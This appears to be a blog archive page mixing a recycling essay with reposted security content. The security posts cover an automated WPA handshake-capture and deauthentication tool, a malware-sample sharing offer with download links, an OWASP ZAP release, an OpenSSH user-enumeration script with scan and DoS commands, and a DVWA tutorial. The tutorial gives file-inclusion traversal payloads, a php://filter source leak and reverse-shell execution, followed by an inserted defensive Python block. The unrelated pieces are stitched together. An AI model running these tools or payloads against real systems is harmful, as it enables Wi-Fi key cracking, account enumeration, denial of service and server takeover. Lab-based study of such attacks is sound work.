Tuesday, June 30, 2020

A Day as a Recycler: When Design Does Not Solve It

The amount of garbage we dump into poorly managed landfills, when not into rivers or seas, is terrifying. Recycling is an absolute necessity, and recyclers, urban heroes, help us recover a good part of what to us is garbage.

The subject obsesses me; I am trying to reduce my household waste to the minimum. On a farm it is easy, since everything organic becomes compost and there is space to sort the recyclables.
Since the recycler does not come through the neighborhoods, only the garbage truck, handing the recyclable material to these urban heroes is not an option, so when the heap of plastics, cardboard and glass exceeded the limits of decency, I filled my ancient Chevrolet Sprint with six months of waste and drove it to the recycling depot not far from my house.

In this short note I tell you what I learned:

The result of several months of recycling, ready to go out. Its value: $22,000


When I arrived I got in line behind two recyclers, with whom I started chatting. On their rounds they make between 30 and 40 thousand pesos a day. In Chía they have organized themselves into a cooperative and divide up territories. The disorderly growth of the municipality and the construction of housing complexes and apartment buildings has benefited them, since in those places they already collect a good amount of sorted material without having to travel very far.

The prices paid for materials are very low and fluctuate with supply and demand. The most profitable is scrap metal, aluminum being the best, followed by cardboard and what they call "archivo" (archive), which is magazines and good-quality paper. I was surprised by how little they pay for glass, $100 per kilo, and for plastic from containers.

My little Sprint, filled to bursting, "yielded" $22,000 in bottles, cardboard and newspapers. My "colleague" Don Gregorio, who was ahead of me in a pedal cart, surely made less.

The problem also has to do with volume. Since plastic is mainly collected as bottles of drinks and household supplies, the volume-to-weight ratio works against the recycler, who, despite crushing the PET bottles and containers, carries a lot of volume with little value.
My trip with the recyclables gave me a return of $22,000, about US$7, with which I later bought the week's seasonal fruit at the market.
At a larger scale the problem also affects the recycling depot, whose chaotic towers of waste take up a lot of space. They are not well regarded by the neighbors and often have land-use problems. The business is surely in the processor, who shreds and melts these materials for later reuse.

Payment time. My little vehicle, bigger than all of my "colleagues'" pedal carts, left me $22,000

In the end my exercise, whose purpose was to understand the problem from the commercialization side in order to think about some hypotheses for design projects, was sterile. More interesting were the reflections while standing in line behind two tiny pedal carts, talking with people who had spent the whole morning collecting perhaps a smaller sum than I earned with my exercise.

I have seen many university design projects proposing carts for recyclers. That is not the problem. If these heroes could carry their material already compacted, even by artisanal means, so as to carry more weight, they still would not gain much. If we have not managed to get people to separate waste into useful and useless, much less will we get it to come out of buildings and complexes already compacted.
Coordination is needed, and there are several actors: citizens, especially in complexes and buildings; recyclers, who must be organized to be efficient; and the municipal administration, which must organize them by geographic sectors and delivery points.

Just as there is a "transport system", there should be a "recycling system", and that, more or less, already exists in many municipalities. In mine, the recyclers have uniforms and shoes as well as support for running their cooperative and for managing routes that are short in distance but favorable in volume collected.

The recycling problem therefore has several scales and is set within several parameters and responsible parties:

1- Corporate social awareness, especially about the excessive use of plastic. It is essential to return to successful past experiences such as returnable bottles in crates, which, to take them home, required leaving "la finca", that is, a deposit that was refunded on return. We should not buy packaging in order to throw it away. Strict regulation is urgently needed in this regard to charge the business owner for their garbage.

1-1. When packaging is not returnable, it should be "collapsible" so that it does not take up so much space in recycling, or it should have a second use; I remember jam jars that later served as drinking glasses at home. Ultralight packaging with little material does not seem a very good idea, since it will have no value on the recycling market and will end up in the dump or polluting seas or rivers.

2- Packaging:
In its role as the product's salesperson, it has become a billboard for itself. Organizing, in the same shelf space, a system of bulk sale, by weight or by unit from a dispenser, can not only be more efficient as advertising but is definitely more sustainable.

3- The shopping cart should be redesigned to avoid plastic bags; grandmothers carried their basket. This concept, which worked for generations, should be revived, in better-thought-out devices of course, if the price measure is weight, not unit, and the shopping basket has removable pockets

4- Supply: Given the boom in home delivery services, is it justified to have inefficient and costly packaging? How can we think of efficient supply without built-in garbage?


In this case, the problem is not one of design; it is one of behavior, empathy, and corporate and environmental awareness.

In the end, designers: there is very little we can do. I, at least, can now call Don Gonzalo, the recycler, so that in six months he can earn his $22,000 for two hours of work rather than a day's rounds.





Thursday, June 11, 2020

Airba.sh - A POSIX-compliant, Fully Automated WPA PSK Handshake Capture Script Aimed At Penetration Testing



Airbash is a POSIX-compliant, fully automated WPA PSK handshake capture script aimed at penetration testing. It is compatible with Bash and Android Shell (tested on Kali Linux and Cyanogenmod 10.2) and uses aircrack-ng to scan for clients that are currently connected to access points (AP). Those clients are then deauthenticated in order to capture the handshake when attempting to reconnect to the AP. Verification of a captured handshake is done using aircrack-ng. If one or more handshakes are captured, they are entered into an SQLite3 database, along with the time of capture and current GPS data (if properly configured).
After capture, the database can be tested for vulnerable router models using crackdefault.sh. It will search for entries that match the implemented modules, which currently include algorithms to compute default keys for Speedport 500-700 series, Thomson/SpeedTouch and UPC 7 digits (UPC1234567) routers.

Requirements
  • WiFi interface in monitor mode
  • aircrack-ng
  • SQLite3
  • openssl for compilation of modules (optional)
  • wlanhc2hcx from hcxtools
In order to log GPS coordinates of handshakes, configure your coordinate logging software to log to .loc/*.txt (the filename can be chosen as desired). Airbash will always use the output of cat "$path$loc"*.txt 2>/dev/null | awk 'NR==0; END{print}', which equals to reading all .txt files in .loc/ and picking the second line. The reason for this way of implementation is the functionality of GPSLogger, which was used on the development device.

Calculating default keys
After capturing a new handshake, the database can be queried for vulnerable router models. If a module applies, the default keys for this router series are calculated and used as input for aircrack-ng to try and recover the passphrase.

Compiling Modules
The modules for calculating Thomson/SpeedTouch and UPC1234567 (7 random digits) default keys are included in src/
Credits for the code go to the authors Kevin Devine and [peter@haxx.in].
On Linux:
gcc -fomit-frame-pointer -O3 -funroll-all-loops -o modules/st modules/stkeys.c -lcrypto
gcc -O2 -o modules/upckeys modules/upc_keys.c -lcrypto
If on Android, you may need to copy the binaries to /system/xbin/ or to another directory where binary execution is allowed.

Usage
Running install.sh will create the database, prepare the folder structure and create shortlinks to both scripts which can be moved to a directory that is on $PATH to allow execution from any location.
After installation, you may need to manually adjust INTERFACE on line 46 in airba.sh. This will later be determined automatically, but for now the default is set to wlan0, to allow out of the box compatibility with bcmon on Android.
./airba.sh starts the script, automatically scanning and attacking targets that are not found in the database. ./crackdefault.sh attempts to break known default key algorithms.
To view the database contents, run sqlite3 .db.sqlite3 "SELECT * FROM hs" in the main directory.

Update (Linux only ... for now):
Airbash can be updated by executing update.sh. This will clone the master branch into /tmp/ and overwrite the local files.

Output
_n: number of access points found
__c/m: represents client number and maximum number of clients found, respectively
-: access point is blacklisted
x: access point already in database
?: access point out of range (not visible to airodump anymore)

The Database
The database contains a table called hs with seven columns.
id: incrementing counter of table entries
lat and lon: GPS coordinates of the handshake (if available)
bssid: MAC address of the access point
essid: Name identifier
psk: WPA Passphrase, if known
prcsd: Flag that gets set by crackdefault.sh to prevent duplicate calculation of default keys if a custom passphrase was used.
Currently, the SQLite3 database is not password-protected.



Ask And You Shall Receive



I get emails from readers asking for specific malware samples and thought I would make a mini post about it.

Yes, I often obtain samples from various sources for my own research.

I am sometimes too lazy/busy to post them but don't mind sharing.
If you are looking for a particular sample, feel free to ask. I might have it.

Send MD5 (several or few samples). I cannot provide hundreds/thousands of samples or any kind of feeds. If you ask for a particular family, I might be able to help if I already have it.

Unfortunately, I do not have time to do homework for students and provide very specific sets of malware with specific features, or guarantee that the C2s are still active. Send your MD5(s), or at least the malware family, and I will check if I have it :) If I have it, I will either send it to you or post it on the blog where you can download it.

If you emailed me in the past and never got an answer, please remind me. Sometimes emails are long with many questions and I flag them to reply to later, when I have time and they get buried or I forget. It does not happen very often but accept my apologies if it happened to you.

Before you ask, check if it is already available via Contagio or Contagio Mobile.
1. Search the blog using the search box on the right side
2. Search here https://www.mediafire.com/folder/b8xxm22zrrqm4/BADINFECT
3. Search here https://www.mediafire.com/folder/c2az029ch6cke/TRAFFIC_PATTERNS_COLLECTION
4. Search here https://www.mediafire.com/folder/78npy8h7h0g9y/MOBILEMALWARE

Cheers,  Mila


Wednesday, June 10, 2020

OWASP ZAP RELEASES V2.8.0 WITH THE HEADS UP DISPLAY

Heads Up Display simplifies and improves vulnerability testing for developers

London, England, 20 June 2019. OWASP™ ZAP (Open Web Application Security Project™  Zed Attack Proxy) has released a new version of its leading ZAP Project which now includes an innovative Heads Up Display (HUD) bringing security information and functionality right into the browser. Now software developers can interactively test the reliability and security of their applications in real time while controlling a wide variety of features designed to test the quality of their software.

ZAP is a free, easy to use integrated penetration testing tool. With the addition of the Heads Up Display, ZAP can be used by security professionals and developers of all skill levels to quickly and more easily find security vulnerabilities in their applications. Given the unique and integrated design of the Heads Up Display, developers and functional testers who might be new to security testing will find ZAP an indispensable tool to build secure software.

The latest version of ZAP can be downloaded from https://www.owasp.org/index.php/ZAP. The full release notes are available at https://github.com/zaproxy/zap-core-help/wiki/HelpReleases2_8_0.

In addition to being one of the most popular free and open source security tools available, ZAP is also one of the most active, with hundreds of volunteers around the globe continually improving and enhancing its features. ZAP provides automated scanners as well as a set of tools that allows new users and security professionals to manually identify security vulnerabilities. ZAP has also been translated into over 25 languages including French, Italian, Dutch, Turkish and Chinese.

Simon Bennetts, OWASP ZAP Project Leader commented: "This is a really important release for the project team and developers who want to build great and secure applications. The HUD is a completely new interface for ZAP and one that is unique in the industry. It shows that open source projects continue to create high-quality, new and exciting tools that deliver real value to the market - and at no cost to users." 

"ZAP is the Foundation's most popular software tool," said Mike McCamon, interim executive director of the OWASP Foundation. McCamon continued, "For nearly two decades OWASP continues to be a great destination for innovators to host, develop, and release software that will secure the web. Simon and the entire ZAP community deserve great recognition for their continued devotion to open source excellence."

For further information please contact:
Simon Bennetts, OWASP ZAP Project Leader: simon.bennetts@owasp.org or Mike McCamon, Interim Executive Director, mike.mccamon@owasp.com

Osueta: A Simple Python Script To Exploit The OpenSSH User Enumeration Timing Attack


About Osueta
   Osueta is a simple Python 2 script to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH versions <= 7.2 and >= 5.*. The script can generate variations of the username used in the brute-force attempt, and can also establish a DoS condition on the OpenSSH server.

    Read more: OpenSSH User Enumeration Time-Based Attack

   The bug was corrected in OpenSSH version 7.3.

   Authors of Osueta:

Osueta's Installation
   For Linux users, open your Terminal and enter these commands:
   If you're Windows users, follow these steps:
  • Install Python 2.7.x from Python.org first. On Install Python 2.7.x Setup, choose Add python.exe to Path.
  • Download Osueta-master zip file.
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install python-nmap paramiko IPy
    python osueta.py -h

Advice: Like other offensive tools, the authors disclaim all responsibility for the use of this script.

Osueta help menu:

Osueta's examples:
   A single user enumeration attempt with username variations:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes


   A single user enumeration attempt with no username variations and a DoS attack:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes


   Scanning a class C network with only one user:
python2 osueta.py -H 192.168.1.0/24 -p 22 -U root -v no 


   Scanning a class C network with usernames from a file, a delay time of 15 seconds and a password of 50000 characters:
python2 osueta.py -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50



Tuesday, June 9, 2020

Learning Web Pentesting With DVWA Part 6: File Inclusion

In this article we are going to go through File Inclusion Vulnerability. Wikipedia defines File Inclusion Vulnerability as: "A file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time. A file include vulnerability is distinct from a generic directory traversal attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file inclusion vulnerability will result in remote code execution on the web server that runs the affected web application."
There are two types of File Inclusion Vulnerabilities, LFI (Local File Inclusion) and RFI (Remote File Inclusion). Offensive Security's Metasploit Unleashed guide describes LFI and RFI as:
"LFI vulnerabilities allow an attacker to read (and sometimes execute) files on the victim machine. This can be very dangerous because if the web server is misconfigured and running with high privileges, the attacker may gain access to sensitive information. If the attacker is able to place code on the web server through other means, then they may be able to execute arbitrary commands.
RFI vulnerabilities are easier to exploit but less common. Instead of accessing a file on the local machine, the attacker is able to execute code hosted on their own machine."
In simpler terms LFI allows us to use the web application's execution engine (say php) to execute local files on the web server and RFI allows us to execute remote files, within the context of the target web server, which can be hosted anywhere remotely (given they can be accessed from the network on which web server is running).
To follow along, click on the File Inclusion navigation link of DVWA, you should see a page like this:
Let's start by doing an LFI attack on the web application.
Looking at the URL of the web application we can see a parameter named page which is used to load different php pages on the website.
http://localhost:9000/vulnerabilities/fi/?page=include.php
Since it is loading different pages we can guess that it is loading local pages from the server and executing them. Let's try to get the famous /etc/passwd file found on every Linux system; to do that we have to find a way to reach it via our LFI. We will start with this:
../etc/passwd
Entering the above payload in the page parameter of the URL:
http://localhost:9000/vulnerabilities/fi/?page=../etc/passwd
we get nothing back, which means the page does not exist at that path. Let's try to understand what we are trying to accomplish. We are asking for a file named passwd in a directory named etc which is one directory up from our current working directory. The etc directory lies at the root (/) of a Linux file system. We guessed that we are in a directory (say www) which also lies at the root of the file system; that's why we tried to go up by one directory and then move to the etc directory which contains the passwd file. Our next guess will be that maybe we are two directories deeper, so we modify our payload to be like this:
../../etc/passwd
We get nothing back. We continue to modify our payload, assuming we are one more directory deeper:
../../../etc/passwd
No luck again; let's try one more:
../../../../etc/passwd
Nope, nothing. We keep going one directory deeper until we get seven directories deep and our payload becomes:
../../../../../../../etc/passwd
which returns the contents of the passwd file as seen below:
This just means that we are currently working in a directory which is seven levels deep inside the root (/) directory. It also proves that our LFI is a success. We can also use php filters to get more information from the server. For example, if we want to get the source code of the web application we can use the php wrapper filter like this:
php://filter/convert.base64-encode/resource=index.php
We will get a base64 encoded string. Let's copy that base64 encoded string into a file and save it as index.php.b64 (the name can be anything) and then decode it like this:
cat index.php.b64 | base64 -d > index.php
We will now be able to read the web application's source code. But you may be thinking: why didn't we simply try to get the index.php file without using the php filter? The reason is that if we request a php file with LFI, the php file will be executed by the php interpreter rather than displayed as a text file. As a workaround we first encode it as base64, which the interpreter won't interpret since it is not php, and thus the text is displayed. Next we will try to get a shell. Before php version 5.2, the allow_url_include setting was enabled by default; from version 5.2 onwards it is disabled by default. Since the version of php on which our dvwa app is running is 5.2+, we cannot use the older methods like the input wrapper or RFI to get a shell on dvwa unless we change the default settings (which I won't). We will use the file upload functionality to get a shell. We will upload a reverse shell using the file upload functionality and then access that uploaded reverse shell via LFI.
Let's upload our reverse shell via the File Upload functionality and then set up our netcat listener to listen for a connection coming from the server.
nc -lvnp 9999
Then using our LFI we will execute the uploaded reverse shell by accessing it using this URL:
http://localhost:9000/vulnerabilities/fi/?page=../../hackable/uploads/revshell.php
Voila! We have a shell.
To learn more about File Upload Vulnerability and the reverse shell we have used here, read Learning Web Pentesting With DVWA Part 5: Using File Upload to Get Shell. Attackers usually chain multiple vulnerabilities to get as much access as they can. This is a simple example of how multiple vulnerabilities (Unrestricted File Upload + LFI) can be used to scale up attacks. If you are interested in learning more about php wrappers then the LFI Cheat Sheet is a good read, and if you want to perform these attacks on dvwa, you'll have to enable the allow_url_include setting by logging in to the dvwa server. That's it for today, have fun.
Leave your questions and queries in the comments below.
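As an added example (not part of this article or of DVWA's own code), the Python below contrasts the unchecked include the tutorial exploits with an allowlisted loader, and flags the article's payloads in access-log lines. BASE_DIR (seven levels deep, matching the traversal count found above), the page allowlist and the log lines are constructed assumptions.

```python
"""Naive vs. hardened resolution of the ?page= parameter, plus a log check.
Added example; paths, allowlist and log lines are constructed for the demo."""
import os
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed stand-in for DVWA's include directory: seven levels below /,
# so exactly seven "../" reach the root, as the article discovered.
BASE_DIR = "/var/www/html/app/dvwa/vulnerabilities/fi"
# Only the pages the application itself links to may ever be included.
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}
# Matches a PHP stream wrapper scheme at the start: php://, http://, data: ...
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.IGNORECASE)


def naive_resolve(page: str) -> str:
    """What an unchecked include($page) effectively does: join the client
    value onto the working directory and honour every '../' in it."""
    return os.path.normpath(os.path.join(BASE_DIR, unquote(page)))


def safe_resolve(page: str) -> Optional[str]:
    """Return the file to include, or None when the request must be refused."""
    page = unquote(page)                 # normalise %2e%2e-style encodings first
    if WRAPPER_RE.match(page):           # php://filter and friends are never files
        return None
    if page not in ALLOWED_PAGES:        # allowlist, not a blacklist of "../"
        return None
    resolved = os.path.normpath(os.path.join(BASE_DIR, page))
    # Containment check: even an allowlisted name must stay under BASE_DIR.
    if os.path.commonpath([BASE_DIR, resolved]) != BASE_DIR:
        return None
    return resolved


def is_suspicious_page_param(value: str) -> bool:
    """True for the value shapes the article feeds into ?page=."""
    value = unquote(value)
    return (".." in value.split("/") or value.startswith("/")
            or bool(WRAPPER_RE.match(value)))


def flag_lfi_requests(log_lines: List[str]) -> List[str]:
    """Return request targets whose page= parameter looks like an LFI attempt."""
    flagged = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        target = m.group(1)
        for value in parse_qs(urlsplit(target).query).get("page", []):
            if is_suspicious_page_param(value):
                flagged.append(target)
                break
    return flagged


# Constructed access-log lines reproducing the requests made in the article.
SAMPLE_LOG = [
    '127.0.0.1 - - [09/Jun/2020:10:00:01 +0000] "GET /vulnerabilities/fi/?page=include.php HTTP/1.1" 200 512',
    '127.0.0.1 - - [09/Jun/2020:10:00:05 +0000] "GET /vulnerabilities/fi/?page=../../../../../../../etc/passwd HTTP/1.1" 200 2048',
    '127.0.0.1 - - [09/Jun/2020:10:00:09 +0000] "GET /vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096',
    '127.0.0.1 - - [09/Jun/2020:10:00:13 +0000] "GET /vulnerabilities/fi/?page=../../hackable/uploads/revshell.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for p in ("include.php", "../../../../../../etc/passwd",
              "../../../../../../../etc/passwd",
              "php://filter/convert.base64-encode/resource=index.php"):
        print(f"{p!r}: naive={naive_resolve(p)} safe={safe_resolve(p)}")
    print("flagged:", flag_lfi_requests(SAMPLE_LOG))
```

Six `../` land in /var/etc/passwd (the "nothing back" case), seven land in /etc/passwd; the hardened resolver refuses every one of the article's payloads while still serving include.php.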

References:

  1. FILE INCLUSION VULNERABILITIES: https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
  2. php://: https://www.php.net/manual/en/wrappers.php.php
  3. LFI Cheat Sheet: https://highon.coffee/blog/lfi-cheat-sheet/
  4. File inclusion vulnerability: https://en.wikipedia.org/wiki/File_inclusion_vulnerability
  5. PHP 5.2.0 Release Announcement: https://www.php.net/releases/5_2_0.php

